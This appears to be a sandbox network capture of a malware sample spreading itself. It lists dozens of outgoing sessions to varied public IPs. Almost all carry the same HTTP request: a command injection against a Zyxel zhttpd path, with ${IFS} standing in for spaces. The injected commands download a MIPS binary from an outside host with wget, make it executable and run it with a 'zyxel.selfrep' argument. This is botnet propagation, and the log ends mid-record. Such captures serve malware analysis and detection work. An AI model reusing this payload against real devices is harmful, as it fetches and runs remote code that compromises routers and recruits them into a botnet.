                                                      Feb 2, 2024 06:35:46.488102913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2713192.168.2.144155894.224.60.233443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.488140106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2714192.168.2.1460262187.191.39.27443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.488188982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2715192.168.2.1460546217.243.126.206443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.488223076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2716192.168.2.145651043.18.217.179443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.488266945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2717192.168.2.1439976122.123.174.13443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.488312006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2718192.168.2.1434672173.89.34.39443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.488354921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2719192.168.2.145156679.94.44.80443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.488413095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2720192.168.2.1453216190.25.87.167443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.488452911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2721192.168.2.1440056155.187.164.135443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.488503933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2722192.168.2.1455180148.41.187.100443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.488563061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2723192.168.2.143417288.67.116.49443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.488600969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2724192.168.2.1455118183.202.36.5443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.488640070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2725192.168.2.1448610120.33.192.119443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.488665104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2726192.168.2.145844654.211.44.153443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.488739014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2727192.168.2.144843845.180.39.229443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.488764048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2728192.168.2.144986823.21.135.201443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.488795042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2729192.168.2.144661698.15.98.86443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.488838911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2730192.168.2.1450546208.26.127.96443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.488876104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2731192.168.2.144004231.43.8.108443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.488902092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2732192.168.2.1448134200.1.44.215443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.488938093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2733192.168.2.1450770222.169.49.220443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.488984108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2734192.168.2.1441480163.239.15.87443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.489037991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2735192.168.2.146041286.139.115.162443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.489058018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2736192.168.2.1441678208.17.47.218443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.489106894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2737192.168.2.1446344100.188.195.148443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.489139080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2738192.168.2.144724660.133.81.114443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.489164114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2739192.168.2.143866284.21.249.244443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.489216089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2740192.168.2.1435778136.136.61.201443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.489245892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2741192.168.2.1437550145.124.112.27443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.489276886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2742192.168.2.1439604223.92.228.229443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.489311934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2743192.168.2.1439190202.161.76.13443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.489341974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2744192.168.2.144555859.134.217.232443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.489372015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2745192.168.2.1460926158.161.19.95443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.489394903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2746192.168.2.145417067.52.63.159443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.489450932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2747192.168.2.1459776148.226.187.117443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.489495039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2748192.168.2.1458292164.168.66.49443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.489531040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2749192.168.2.1440812185.234.134.165443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.489572048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2750192.168.2.1433668189.227.102.145443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.489610910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2751192.168.2.144574863.81.122.11443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.489636898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2752192.168.2.1438080157.168.191.94443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.489685059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2753192.168.2.1435560221.35.229.4443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.489722013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2754192.168.2.1457520113.215.139.85443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.489768982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2755192.168.2.1440658180.137.175.214443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.489795923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2756192.168.2.1459374188.34.201.201443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.489830971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2757192.168.2.1456292188.55.194.254443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.489897013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2758192.168.2.144925483.243.181.184443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.489911079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2759192.168.2.1452828129.95.227.46443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.489949942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2760192.168.2.1434230109.57.15.103443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.489972115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2761192.168.2.143380414.94.250.178443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.490029097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2762192.168.2.144617024.199.187.99443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.490052938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2763192.168.2.1436886145.68.172.82443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.490108013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2764192.168.2.1438864105.37.235.13443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.490149975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2765192.168.2.1442668194.70.219.89443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.490194082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2766192.168.2.1457026143.246.84.250443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.490235090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2767192.168.2.1459526201.183.127.163443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.490283012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2768192.168.2.1442662110.208.157.143443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.490314960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2769192.168.2.1456426183.160.190.104443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.490362883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2770192.168.2.1455826107.191.239.217443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.490421057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2771192.168.2.144726658.110.5.244443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.490437984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2772192.168.2.1452644210.138.190.46443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.490473986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2773192.168.2.1442566160.108.207.113443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.490492105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2774192.168.2.1441868205.179.85.183443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.490545034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2775192.168.2.1444432173.77.131.146443
                                                      TimestampBytes transferredDirectionData
